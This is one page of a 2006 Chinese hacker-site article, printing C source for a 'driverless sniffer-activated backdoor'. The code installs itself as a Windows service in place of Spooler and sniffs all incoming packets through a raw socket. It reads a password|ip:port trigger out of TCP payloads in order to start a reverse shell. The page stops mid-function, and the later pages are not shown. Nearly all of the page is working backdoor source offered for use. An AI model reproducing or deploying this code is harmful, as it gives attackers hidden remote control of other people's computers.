| 首页 | 技术文章 | 软件下载 | 博客 | 论坛 | 精品教程 | 黑客动画 | 视频资源 | 在线服务 | 黑客游戏 | 

您现在的位置: 中国X黑客小组 >> 技术文章 >> 编程技术 >> 黑客编程 >> 文章正文 用户登录 新用户注册
  简单的无驱动嗅探启动后门        【字体:
简单的无驱动嗅探启动后门
作者:未知    文章来源:CnXHacker.Net    点击数:    更新时间:2006-11-15    
SS )
{
#ifdef DEBUG
char tmp[256] = { 0 };
sprintf( tmp, "Unstall: Set key %s value error: %d\n", REPLACE_SERVICE_NAME, GetLastError() );
LogToFile( tmp );
#endif

return FALSE;
}

#ifdef DEBUG
LogToFile( "Unstall: write regedit successful\n" );
#endif

RegCloseKey(key);

return TRUE;
}

///////////////////////////////////////////////////////////////////////////////
//服务函数主体,启动嗅探模块
///////////////////////////////////////////////////////////////////////////////

void ServiceMain( DWORD argc, char *argv[] )
{
serviceStatus.dwServiceType = SERVICE_WIN32_OWN_PROCESS;//here
serviceStatus.dwCurrentState = SERVICE_START_PENDING;
serviceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP;
serviceStatus.dwWin32ExitCode = 0;
serviceStatus.dwServiceSpecificExitCode = 0;
serviceStatus.dwCheckPoint = 0;
serviceStatus.dwWaitHint = 0;

#ifdef DEBUG
LogToFile( "ServiceMain: Try to register service\n" );
#endif

hServiceStatus = RegisterServiceCtrlHandler( SERVICE_NAME, (LPHANDLER_FUNCTION)ServiceControl );
if( hServiceStatus == (SERVICE_STATUS_HANDLE)0 )
{
#ifdef DEBUG
char tmp[256] = { 0 };
sprintf( tmp, "ServiceMain: Register service error: %d\n", GetLastError() );
LogToFile( tmp );
#endif

return;
}

serviceStatus.dwCurrentState = SERVICE_RUNNING;
serviceStatus.dwCheckPoint = 0;
serviceStatus.dwWaitHint = 0;

#ifdef DEBUG
LogToFile( "ServiceMain: Try to start service\n" );
#endif

if( !SetServiceStatus( hServiceStatus, &serviceStatus ) )
{
#ifdef DEBUG
char tmp[256] = { 0 };
sprintf( tmp, "ServiceMain: Start service error: %d\n", GetLastError() );
LogToFile( tmp );
#endif

return;
}

isRunning = TRUE;

#ifdef DEBUG
LogToFile( "ServiceMain: Service is running now\n" );
#endif

while( TRUE )
{
if( !isRunning )
{
break;
}

#ifdef DEBUG
LogToFile( "ServiceMain: Start sniffer now\n" );
#endif

Sniffer( );
}

serviceStatus.dwCurrentState = SERVICE_STOPPED;

if( !SetServiceStatus( hServiceStatus, &serviceStatus) )
{
#ifdef DEBUG
char tmp[256] = { 0 };
sprintf( tmp, "ServiceMain: Stop service error: %d\n", GetLastError() );
LogToFile( tmp );
#endif
}

return;
}

///////////////////////////////////////////////////////////////////////////////
//服务控制函数
///////////////////////////////////////////////////////////////////////////////

void ServiceControl( DWORD request )
{
#ifdef DEBUG
LogToFile( "ServiceControl: Into ServiceControl\n" );
#endif

switch ( request )
{
case SERVICE_CONTROL_PAUSE:

serviceStatus.dwCurrentState = SERVICE_PAUSED;

break;

case SERVICE_CONTROL_CONTINUE:

serviceStatus.dwCurrentState = SERVICE_RUNNING;

break;

case SERVICE_CONTROL_STOP:

#ifdef DEBUG
LogToFile( "ServiceControl: Try to stop service\n" );
#endif

serviceStatus.dwWin32ExitCode = 0;
serviceStatus.dwCurrentState = SERVICE_STOP_PENDING;
serviceStatus.dwCheckPoint = 0;
serviceStatus.dwWaitHint = 0;

isRunning = FALSE;

if( !SetServiceStatus( hServiceStatus, &serviceStatus) )
{
#ifdef DEBUG
char tmp[256] = { 0 };
sprintf( tmp, "ServiceMain: Stop service error: %d\n", GetLastError() );
LogToFile( tmp );
#endif
}
return;

case SERVICE_CONTROL_INTERROGATE:

break;

default:

#ifdef DEBUG
LogToFile( "ServiceControl: Error arguments\n" );
#endif

break;
}

if( !SetServiceStatus( hServiceStatus, &serviceStatus ) )
{
#ifdef DEBUG
char tmp[256] = { 0 };
sprintf( tmp, "ServiceMain: Stop service error: %d\n", GetLastError() );
LogToFile( tmp );
#endif
}

return;
}

///////////////////////////////////////////////////////////////////////////////
//记录日志函数
///////////////////////////////////////////////////////////////////////////////

#ifdef DEBUG
void LogToFile( char *str )
{
FILE *fp;

fp = fopen( DEBUG_LOG, "a" );
fputs( str, fp );
fclose( fp );
}
#endif

///////////////////////////////////////////////////////////////////////////////
//输出帮助函数
///////////////////////////////////////////////////////////////////////////////

void Help( char *prog )
{
printf( "\n===================Code by 云舒(ph4nt0m.org)===================\n" );
printf( "%s\t<-install>|<-unstall>\n", prog );
printf( "after install,please restart the service which name is Spooler\n" );
}

///////////////////////////////////////////////////////////////////////////////
//嗅探模块,抓取数据包
///////////////////////////////////////////////////////////////////////////////

int Sniffer( void )
{
WSADATA wsaData;
char FAR hostName[128] = { 0 };//存放主机名
struct hostent *phe;//存放IP地址结构
char myIP[16] = { 0 };
SOCKET sock;
char recvBuffer[BUFFER_SIZE] = { 0 };//缓冲区存放捕获的数据
SOCKADDR_IN sniff;

if( WSAStartup(MAKEWORD(2,2), &wsaData) != 0 )
{
#ifdef DEBUG
char tmp[512] = { 0 };
sprintf( tmp, "Sniffer: WSAStartup error: %d\n", GetLastError() );
LogToFile( tmp );
#endif

return -1;
}

gethostname( hostName ,128 );//获取本机主机名
phe = gethostbyname( hostName );//获取本机ip地址结构

if( phe == NULL )
{
#ifdef DEBUG
char tmp[512] = { 0 };
sprintf( tmp, "Sniffer: GetHostName error: %d\n", GetLastError() );
LogToFile( tmp );
#endif

return -1;
}


struct in_addr addr;
int ipIndex;
for( ipIndex = 0 ; phe->h_addr_list[ipIndex] ; ipIndex++ )
{
memcpy(&addr , phe->h_addr_list[ipIndex] , 4);

//优先绑定不是内网的ip地址
if( (strncmp(inet_ntoa(addr) , "10." , 3) != 0) &&
(strncmp(inet_ntoa(addr) , "192.168." , 8) != 0) &&
(strncmp(inet_ntoa(addr) , "172." , 4) != 0) )
{
strcpy( myIP , inet_ntoa(addr) );
break;
}
}
//否则绑定第一个IP地址
if( strlen(myIP) == 0 )
{
memcpy(&addr , phe->h_addr_list[0] , 4);
strcpy( myIP , inet_ntoa(addr) );
}

#ifdef DEBUG
LogToFile( "Sniffer: Local IP is " );
LogToFile( myIP );
LogToFile( "\n" );
#endif

//建立socket监听数据包
sock = socket( AF_INET, SOCK_RAW, IPPROTO_IP );

#ifdef DEBUG
LogToFile( "Sniffer: Sniffer socket is ok now...\n" );
#endif

sniff.sin_family = AF_INET;
sniff.sin_port = htons(0);
sniff.sin_addr.s_addr = inet_addr( myIP );

//绑定到本地随机端口
bind(sock,(PSOCKADDR)&sniff,sizeof(sniff));

#ifdef DEBUG
LogToFile( "Sniffer: Sniffer bind is ok now...\n" );
#endif

//设置SOCK_RAW为SIO_RCVALL,以便接收所有的IP包
DWORD dwBufferLen[10] = { 0 };
DWORD dwBufferInLen = 1;
DWORD dwBytesReturned = 0 ;
WSAIoctl(sock,SIO_RCVALL,&dwBufferInLen,sizeof(dwBufferInLen),&dwBufferLen,sizeof(dwBufferLen),&dwBytesReturned,NULL,NULL);

#ifdef DEBUG
LogToFile( "Sniffer: Begain to recv...\n" );
#endif

int bytesRecived = 0;
while(TRUE)
{
//如果服务停止,跳出
if( !isRunning )
{
break;
}

memset( recvBuffer, 0, BUFFER_SIZE );

//开始捕获数据包
bytesRecived = recv( sock, recvBuffer, sizeof(recvBuffer), 0 );
if( bytesRecived <= 0 )
{
#ifdef DEBUG
LogToFile( "Sniffer: recv nothing,break...\n" );
#endif

break;
}
else
{
#ifdef DEBUG
LogToFile( "Sniffer: recv ok,decode it...\n" );
#endif

DecodeTCP( recvBuffer );
}
}
closesocket( sock );
WSACleanup( );
return 1;
}

///////////////////////////////////////////////////////////////////////////////
//分析数据包,启动后门
///////////////////////////////////////////////////////////////////////////////

int DecodeTCP( char *buffer )
{
IP_HEADER *ipHeader;//IP_HEADER型指针
TCP_HEADER *tcpHeader;//TCP_HEADER型指针
struct in_addr inAddr;
char ourData[BUFFER_SIZE] = { 0 };
char *flag1 = NULL;
char *flag2 = NULL;
char password[64] = { 0 };
SHELL_ARGUMENT shellArgument;
HANDLE threadHandle = NULL;
DWORD threadID = 1;

ipHeader = (IP_HEADER *)buffer;

//是否TCP协议
if( ipHeader->proto != 6 )
{
return -1;
}

tcpHeader = (TCP_HEADER *)( buffer+sizeof(IP_HEADER) );

//是否有数据
if( buffer+sizeof(IP_HEADER)+sizeof(TCP_HEADER) == NULL )
{
return -1;
}

strncpy( ourData, buffer+sizeof(IP_HEADER) + sizeof(TCP_HEADER), BUFFER_SIZE - 2 );

flag1 = strchr( ourData, '|' );
flag2 = strchr( ourData, ':' );

//flag2-flag1为反向连接ip的长度,flag1 - ourData为密码长度
if( flag1 == NULL || flag2 == NULL ||
(flag2 - flag1) > sizeof(shellArgument.ip) || (flag1 - ourData) > (sizeof(password)-1)
)

{
return -1;
}

#ifdef DEBUG
LogToFile( "DecodeTCP: Have data...\n" );
LogToFile( "DecodeTCP: " );
LogToFile( ourData );
LogToFile( "\n\n" );
#endif

ZeroMemory( shellArgument.ip, sizeof(shellArgument.ip) );
ZeroMemory( shellArgument.port, sizeof(shellArgument.port) );

//获取密码
strncpy( password, ourData, flag1 - ourData );

//获取反连IP
strncpy( shellArgument.ip, flag1 + sizeof('|'), flag2-(flag1 + sizeof('|')) );

//获取端口
strncpy( shellArgument.port, flag2 + sizeof(':'), sizeof(shellArgument.port) - 1 );

//去掉port后面的回车字符
if( strchr( shellArgument.port, '\n' ) != NULL )
{
*strchr( shellArgument.port, '\n' ) = '';
}

#ifdef DEBUG
LogToFile( "DecodeTCP: password is " );
LogToFile( password );
LogToFile( "\nDecodeTCP: Remote ip

上一页  [1] [2] [3] 下一页

文章录入:IceRiver    责任编辑:IceRiver 
  • 上一篇文章:

  • 下一篇文章:
    • 发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    最新热点 最新推荐 相关文章
    简单了解局域网内部的ARP攻击
    推荐:找寻蛛丝马迹 简单方法
    shell编程例子 -- 一个简单的
    浏览器遭恶意修改 简单有效的
    简单打造不死鸽子
    简单五步骤预防AV终结者病毒
    简单方法检测电脑是否中病毒
    IP地址冲突简单查找方法与预
    做黑客很简单 用IE浏览器实
    探密QQ登陆加密算法兼谈简单
      网友评论:(只显示最新5条。评论内容只代表网友观点,与本站立场无关!)
    Powered by ICE RIVER - STUDIO
    » CnXHacker.CoM   © CopyRight 2002-2006, CnXHacker.CoM™, Inc. All Rights Reserved.